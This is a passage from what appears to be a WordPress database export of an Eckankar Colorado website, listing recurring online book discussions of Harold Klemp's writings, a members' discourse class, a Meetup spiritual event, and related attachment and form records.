class=\"PageHeader\">Spiritual Lessons from Living - Mahanta Transcripts, Book 18</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"> Harold Klemp\'s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 12pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life--there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God\'s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Author of more than one hundred books, he continues to write, including many articles and spiritual-study discourses. His books have been translated into more than 18 languages. These transcripts reveal his approach to giving insights, wisdom, and guidance through the stories of people from around the world. Spanning a variety of topics</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-2234-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','ONLINE Book Discussion - Spiritual Lessons from Living - Mahanta Transcripts, Book 18','','publish','closed','closed','','online-book-discussion-spiritual-lessons-from-living-2022-01-02','','','2021-01-14 14:41:12','2021-01-14 21:41:12','',263367,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2022-01-02#038;p=263367',0,'tribe_events','',0),(263379,2,'2021-01-14 14:21:03','2021-01-14 21:21:03','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">Spiritual Lessons from Living - Mahanta Transcripts, Book 18</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"> Harold Klemp\'s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 12pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life--there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God\'s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Author of more than one hundred books, he continues to write, including many articles and spiritual-study discourses. His books have been translated into more than 18 languages. These transcripts reveal his approach to giving insights, wisdom, and guidance through the stories of people from around the world. Spanning a variety of topics</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-2234-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','ONLINE Book Discussion - Spiritual Lessons from Living - Mahanta Transcripts, Book 18','','publish','closed','closed','','online-book-discussion-spiritual-lessons-from-living-2022-02-06','','','2021-01-14 14:41:46','2021-01-14 21:41:46','',263367,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2022-02-06#038;p=263367',0,'tribe_events','',0),(263404,2,'2021-01-14 14:31:00','2021-01-14 21:31:00','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Shariyat-Ki-Sugmad Book 2</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"><em><strong>The Shariyat-Ki-Sugmad</strong> </em>means \"Way of the Eternal.\" These writings are the scriptures of Eckankar, Religion of the Light and Sound of God. Though they\'re possibly the oldest teachings known on earth, they speak to you directly—today. They come alive in your heart.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Through <em><strong>The Shariyat-Ki-Sugmad</strong></em> you will discover an answer to every human question ever yet, or to be, devised. Its pages tell what life really consists of and how to live it. The essence of God-knowledge is laid down here and offered to you. Book Two is the second section of these sacred writings.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-64-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','Online Book Discussion - The Shariyat-Ki-Sugmad Book 2','','publish','closed','closed','','online-book-discussion-the-shariyat-ki-sugmad-book-2','','','2021-01-14 14:40:07','2021-01-14 21:40:07','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263404',0,'tribe_events','',0),(263417,2,'2021-01-14 14:31:00','2021-01-14 21:31:00','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Shariyat-Ki-Sugmad Book 2</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"><em><strong>The Shariyat-Ki-Sugmad</strong> </em>means \"Way of the Eternal.\" These writings are the scriptures of Eckankar, Religion of the Light and Sound of God. Though they\'re possibly the oldest teachings known on earth, they speak to you directly—today. They come alive in your heart.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Through <em><strong>The Shariyat-Ki-Sugmad</strong></em> you will discover an answer to every human question ever yet, or to be, devised. Its pages tell what life really consists of and how to live it. The essence of God-knowledge is laid down here and offered to you. Book Two is the second section of these sacred writings.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-64-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','Online Book Discussion - The Shariyat-Ki-Sugmad Book 2','','publish','closed','closed','','online-book-discussion-the-shariyat-ki-sugmad-book-2-2020-12-27','','','2021-01-14 14:40:07','2021-01-14 21:40:07','',263404,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2020-12-27#038;p=263404',0,'tribe_events','',0),(263418,2,'2021-01-14 14:31:00','2021-01-14 21:31:00','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Shariyat-Ki-Sugmad Book 2</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"><em><strong>The Shariyat-Ki-Sugmad</strong> </em>means \"Way of the Eternal.\" These writings are the scriptures of Eckankar, Religion of the Light and Sound of God. Though they\'re possibly the oldest teachings known on earth, they speak to you directly—today. They come alive in your heart.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Through <em><strong>The Shariyat-Ki-Sugmad</strong></em> you will discover an answer to every human question ever yet, or to be, devised. Its pages tell what life really consists of and how to live it. The essence of God-knowledge is laid down here and offered to you. Book Two is the second section of these sacred writings.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-64-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','Online Book Discussion - The Shariyat-Ki-Sugmad Book 2','','publish','closed','closed','','online-book-discussion-the-shariyat-ki-sugmad-book-2-2021-01-31','','','2021-01-14 14:40:07','2021-01-14 21:40:07','',263404,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-01-31#038;p=263404',0,'tribe_events','',0),(263419,2,'2021-01-14 14:31:00','2021-01-14 21:31:00','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Shariyat-Ki-Sugmad Book 2</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"><em><strong>The Shariyat-Ki-Sugmad</strong> </em>means \"Way of the Eternal.\" These writings are the scriptures of Eckankar, Religion of the Light and Sound of God. Though they\'re possibly the oldest teachings known on earth, they speak to you directly—today. They come alive in your heart.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Through <em><strong>The Shariyat-Ki-Sugmad</strong></em> you will discover an answer to every human question ever yet, or to be, devised. Its pages tell what life really consists of and how to live it. The essence of God-knowledge is laid down here and offered to you. Book Two is the second section of these sacred writings.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-64-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','Online Book Discussion - The Shariyat-Ki-Sugmad Book 2','','publish','closed','closed','','online-book-discussion-the-shariyat-ki-sugmad-book-2-2021-02-28','','','2021-01-14 14:40:07','2021-01-14 21:40:07','',263404,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-28#038;p=263404',0,'tribe_events','',0),(263420,2,'2021-01-14 14:31:00','2021-01-14 21:31:00','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Shariyat-Ki-Sugmad Book 2</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"><em><strong>The Shariyat-Ki-Sugmad</strong> </em>means \"Way of the Eternal.\" These writings are the scriptures of Eckankar, Religion of the Light and Sound of God. Though they\'re possibly the oldest teachings known on earth, they speak to you directly—today. They come alive in your heart.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Through <em><strong>The Shariyat-Ki-Sugmad</strong></em> you will discover an answer to every human question ever yet, or to be, devised. Its pages tell what life really consists of and how to live it. The essence of God-knowledge is laid down here and offered to you. Book Two is the second section of these sacred writings.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-64-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','Online Book Discussion - The Shariyat-Ki-Sugmad Book 2','','publish','closed','closed','','online-book-discussion-the-shariyat-ki-sugmad-book-2-2021-03-28','','','2021-01-14 14:40:07','2021-01-14 21:40:07','',263404,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-28#038;p=263404',0,'tribe_events','',0),(263421,2,'2021-01-14 14:31:00','2021-01-14 21:31:00','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Shariyat-Ki-Sugmad Book 2</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"><em><strong>The Shariyat-Ki-Sugmad</strong> </em>means \"Way of the Eternal.\" These writings are the scriptures of Eckankar, Religion of the Light and Sound of God. Though they\'re possibly the oldest teachings known on earth, they speak to you directly—today. They come alive in your heart.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Through <em><strong>The Shariyat-Ki-Sugmad</strong></em> you will discover an answer to every human question ever yet, or to be, devised. Its pages tell what life really consists of and how to live it. The essence of God-knowledge is laid down here and offered to you. Book Two is the second section of these sacred writings.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-64-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','Online Book Discussion - The Shariyat-Ki-Sugmad Book 2','','publish','closed','closed','','online-book-discussion-the-shariyat-ki-sugmad-book-2-2021-04-25','','','2021-01-14 14:40:08','2021-01-14 21:40:08','',263404,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-25#038;p=263404',0,'tribe_events','',0),(263422,2,'2021-01-14 14:31:00','2021-01-14 21:31:00','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Shariyat-Ki-Sugmad Book 2</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"><em><strong>The Shariyat-Ki-Sugmad</strong> </em>means \"Way of the Eternal.\" These writings are the scriptures of Eckankar, Religion of the Light and Sound of God. Though they\'re possibly the oldest teachings known on earth, they speak to you directly—today. They come alive in your heart.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Through <em><strong>The Shariyat-Ki-Sugmad</strong></em> you will discover an answer to every human question ever yet, or to be, devised. Its pages tell what life really consists of and how to live it. The essence of God-knowledge is laid down here and offered to you. Book Two is the second section of these sacred writings.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-64-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','Online Book Discussion - The Shariyat-Ki-Sugmad Book 2','','publish','closed','closed','','online-book-discussion-the-shariyat-ki-sugmad-book-2-2021-05-30','','','2021-01-14 14:40:08','2021-01-14 21:40:08','',263404,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-30#038;p=263404',0,'tribe_events','',0),(263423,2,'2021-01-14 14:31:00','2021-01-14 21:31:00','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Shariyat-Ki-Sugmad Book 2</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"><em><strong>The Shariyat-Ki-Sugmad</strong> </em>means \"Way of the Eternal.\" These writings are the scriptures of Eckankar, Religion of the Light and Sound of God. Though they\'re possibly the oldest teachings known on earth, they speak to you directly—today. They come alive in your heart.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Through <em><strong>The Shariyat-Ki-Sugmad</strong></em> you will discover an answer to every human question ever yet, or to be, devised. Its pages tell what life really consists of and how to live it. The essence of God-knowledge is laid down here and offered to you. Book Two is the second section of these sacred writings.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-64-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','Online Book Discussion - The Shariyat-Ki-Sugmad Book 2','','publish','closed','closed','','online-book-discussion-the-shariyat-ki-sugmad-book-2-2021-06-27','','','2021-01-14 14:40:08','2021-01-14 21:40:08','',263404,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-27#038;p=263404',0,'tribe_events','',0),(263424,2,'2021-01-14 14:31:00','2021-01-14 21:31:00','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Shariyat-Ki-Sugmad Book 2</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"><em><strong>The Shariyat-Ki-Sugmad</strong> </em>means \"Way of the Eternal.\" These writings are the scriptures of Eckankar, Religion of the Light and Sound of God. Though they\'re possibly the oldest teachings known on earth, they speak to you directly—today. They come alive in your heart.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Through <em><strong>The Shariyat-Ki-Sugmad</strong></em> you will discover an answer to every human question ever yet, or to be, devised. Its pages tell what life really consists of and how to live it. The essence of God-knowledge is laid down here and offered to you. Book Two is the second section of these sacred writings.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-64-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','Online Book Discussion - The Shariyat-Ki-Sugmad Book 2','','publish','closed','closed','','online-book-discussion-the-shariyat-ki-sugmad-book-2-2021-07-25','','','2021-01-14 14:40:08','2021-01-14 21:40:08','',263404,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-25#038;p=263404',0,'tribe_events','',0),(263425,2,'2021-01-14 14:31:00','2021-01-14 21:31:00','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Shariyat-Ki-Sugmad Book 2</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"><em><strong>The Shariyat-Ki-Sugmad</strong> </em>means \"Way of the Eternal.\" These writings are the scriptures of Eckankar, Religion of the Light and Sound of God. Though they\'re possibly the oldest teachings known on earth, they speak to you directly—today. They come alive in your heart.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Through <em><strong>The Shariyat-Ki-Sugmad</strong></em> you will discover an answer to every human question ever yet, or to be, devised. Its pages tell what life really consists of and how to live it. The essence of God-knowledge is laid down here and offered to you. Book Two is the second section of these sacred writings.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-64-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','Online Book Discussion - The Shariyat-Ki-Sugmad Book 2','','publish','closed','closed','','online-book-discussion-the-shariyat-ki-sugmad-book-2-2021-08-29','','','2021-01-14 14:40:08','2021-01-14 21:40:08','',263404,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-29#038;p=263404',0,'tribe_events','',0),(263426,2,'2021-01-14 14:31:00','2021-01-14 21:31:00','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Shariyat-Ki-Sugmad Book 2</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"><em><strong>The Shariyat-Ki-Sugmad</strong> </em>means \"Way of the Eternal.\" These writings are the scriptures of Eckankar, Religion of the Light and Sound of God. Though they\'re possibly the oldest teachings known on earth, they speak to you directly—today. They come alive in your heart.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Through <em><strong>The Shariyat-Ki-Sugmad</strong></em> you will discover an answer to every human question ever yet, or to be, devised. Its pages tell what life really consists of and how to live it. The essence of God-knowledge is laid down here and offered to you. Book Two is the second section of these sacred writings.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-64-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','Online Book Discussion - The Shariyat-Ki-Sugmad Book 2','','publish','closed','closed','','online-book-discussion-the-shariyat-ki-sugmad-book-2-2021-09-26','','','2021-01-14 14:40:09','2021-01-14 21:40:09','',263404,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-26#038;p=263404',0,'tribe_events','',0),(263427,2,'2021-01-14 14:31:00','2021-01-14 21:31:00','<p><span style=\"color: #f28a27;font-size: 20pt\"><em>\"<span class=\"PageHeader\">The Shariyat-Ki-Sugmad Book 2</span>\" </em></span><span style=\"font-size: 14pt\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt\"><em><strong>The Shariyat-Ki-Sugmad</strong> </em>means \"Way of the Eternal.\" These writings are the scriptures of Eckankar, Religion of the Light and Sound of God. Though they\'re possibly the oldest teachings known on earth, they speak to you directly—today. They come alive in your heart.</span></p>\r\n<p><span style=\"font-size: 12pt\">Through <em><strong>The Shariyat-Ki-Sugmad</strong></em> you will discover an answer to every human question ever yet, or to be, devised. Its pages tell what life really consists of and how to live it. The essence of God-knowledge is laid down here and offered to you. Book Two is the second section of these sacred writings.</span></p>\r\n<p><span style=\"font-size: 12pt\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-64-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','Online Book Discussion - The Shariyat-Ki-Sugmad Book 2','','publish','closed','closed','','online-book-discussion-the-shariyat-ki-sugmad-book-2-2021-10-31','','','2021-01-14 14:50:35','2021-01-14 21:50:35','',263404,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-31#038;p=263404',0,'tribe_events','',0),(263449,0,'2021-01-14 15:16:23','2021-01-14 22:16:23','','','','publish','closed','closed','','263449','','','2021-01-14 15:16:23','2021-01-14 22:16:23','',0,'https://eckankar-colorado.org/nf_sub/263449/',0,'nf_sub','',0),(263450,0,'2021-01-18 14:39:02','2021-01-18 21:39:02','','','','publish','closed','closed','','263450','','','2021-01-18 14:39:02','2021-01-18 21:39:02','',0,'https://eckankar-colorado.org/nf_sub/263450/',0,'nf_sub','',0),(263454,0,'2021-01-24 08:23:54','2021-01-24 15:23:54','','','','publish','closed','closed','','263454','','','2021-01-24 08:23:54','2021-01-24 15:23:54','',0,'https://eckankar-colorado.org/nf_sub/263454/',0,'nf_sub','',0),(263456,0,'2021-01-26 17:58:36','2021-01-27 00:58:36','','','','publish','closed','closed','','263456','','','2021-01-26 17:58:36','2021-01-27 00:58:36','',0,'https://eckankar-colorado.org/nf_sub/263456/',0,'nf_sub','',0),(263457,0,'2021-01-26 17:59:52','2021-01-27 00:59:52','','','','publish','closed','closed','','263457','','','2021-01-26 17:59:52','2021-01-27 00:59:52','',0,'https://eckankar-colorado.org/nf_sub/263457/',0,'nf_sub','',0),(263459,2,'2021-01-27 13:49:47','2021-01-27 20:49:47','<p><span style=\"color: #666666;\"><span style=\"font-size: 15pt;\"><strong>Do you want to manifest your spiritual destiny?<br />\r\n</strong></span><span style=\"font-size: 15pt;\"><strong>Would you like to recognize and work with the divine love all around you?<br />\r\n</strong></span><span style=\"font-size: 15pt;\"><strong>Do you want to hook up with the sound current and ride it into the heart of God?</strong></span></span></p>\r\n<p><span style=\"font-size: 12pt;\">If you are looking for true and actual experience with Divine Spirit then this discussion is for you. Here in modern, western culture you can take your next step to God Realization. The love is all around you. Through dreams, past lives, and soul travel you can live your own uniquely designed spiritual quest and climb the spiritual mountain.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">“The quest! People have pursued it across the pages of history, yet it has always eluded them. They were looking for a precious treasure out there. But it was hidden in their very own hearts the whole time.”</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">“The quest is to live a God-Realized life. What is the core of God-Realization if not divine love? So, the quest means learning to give and receive God’s love in an always-increasing measure. One doesn’t have to run around frantically in search of it. God’s love is all around.”</span><br />\r\n <span style=\"font-size: 12pt;\">—Quotes by Harold Klemp from the <em>Spiritual Wisdom Journal</em> referenced below.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Join us for the online discussion where you can choose to share, ask questions or just listen as others share their experience in taking charge of their own destiny as they climb the spiritual mountain. The discussion will be based on participant’s experience and content from the <em>ECKANKAR Spiritual Wisdom Journal</em> titled “<em>Climb the Spiritual Mountain</em>.”</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">During the discussion you will have the opportunity to listen or chant HU a love song to God. HU is an undirected prayer that can open a link between you and the Holy Spirit. It is not meant to change your current beliefs but to enhance them.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">You may wish to try contemplating on the Spiritual Exercise “The Mountain of God” included in the <em>Spiritual Wisdom Journal</em> titled <em>“Climbing the Spiritual Mountain” </em>In this exercise you will have the opportunity to listen for the Sound of God. This free publication can be viewed or downloaded at:</span></p>\r\n<p><span style=\"font-size: 12pt;\"><a href=\"https://www.spiritualwisdomjournal.org/Archives/swj_jan2021.pdf\"><em>ECKANKAR Spiritual Wisdom Journal</em></a></span></p>\r\n<p>&nbsp;</p>\r\n<p><strong><span style=\"font-size: 12pt;\"> </span></strong><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofGolden/events/275992875/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP VIRTUAL ONLINE EVENT<br>Climb the Spiritual Mountain','','publish','closed','closed','','meetup-virtual-online-eventclimb-the-spiritual-mountain','','','2021-01-27 14:03:02','2021-01-27 21:03:02','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263459',0,'tribe_events','',0),(263460,2,'2021-01-27 13:47:38','2021-01-27 20:47:38','','green-mtn-path','','inherit','closed','closed','','green-mtn-path','','','2021-01-27 13:47:38','2021-01-27 20:47:38','',263459,'https://eckankar-colorado.org/wp-content/uploads/2021/01/green-mtn-path.jpg',0,'attachment','image/jpeg',0),(263481,2,'2021-01-27 20:17:52','2021-01-28 03:17:52','','ELSS-1-27-2021','','inherit','closed','closed','','elss-1-27-2021','','','2021-01-27 20:17:52','2021-01-28 03:17:52','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/01/ELSS-1-27-2021.jpg',0,'attachment','image/jpeg',0),(263526,2,'2021-01-28 12:10:34','2021-01-28 19:10:34','','','','publish','closed','closed','','263526','','','2021-01-28 12:10:34','2021-01-28 19:10:34','',0,'https://eckankar-colorado.org/nf_sub/263526/',0,'nf_sub','',0),(263527,2,'2021-01-28 12:13:03','2021-01-28 19:13:03','','','','publish','closed','closed','','263527','','','2021-01-28 12:13:03','2021-01-28 19:13:03','',0,'https://eckankar-colorado.org/nf_sub/263527/',0,'nf_sub','',0),(263589,2,'2021-01-29 20:35:09','2021-01-30 03:35:09','','Satsang Class','','publish','closed','closed','','satsang-class','','','2021-01-29 20:35:09','2021-01-30 03:35:09','',0,'https://eckankar-colorado.org/?post_type=tribe_venue&#038;p=263589',0,'tribe_venue','',0),(263590,2,'2021-01-14 13:24:16','2021-01-14 20:24:16','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: \'The Letters of Light and Sound 1\' class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2-2021-03-20','','','2021-01-29 20:52:48','2021-01-30 03:52:48','',263349,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-20#038;p=263349',0,'tribe_events','',0),(263591,2,'2021-01-14 13:24:16','2021-01-14 20:24:16','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: \'The Letters of Light and Sound 1\' class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually 